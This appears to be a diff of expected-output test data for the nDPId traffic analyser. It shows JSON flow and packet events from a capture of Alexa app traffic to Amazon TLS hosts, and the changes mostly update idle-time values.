+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00190{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976048620} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976048429,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1490976055356,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976055356,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} 00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"} 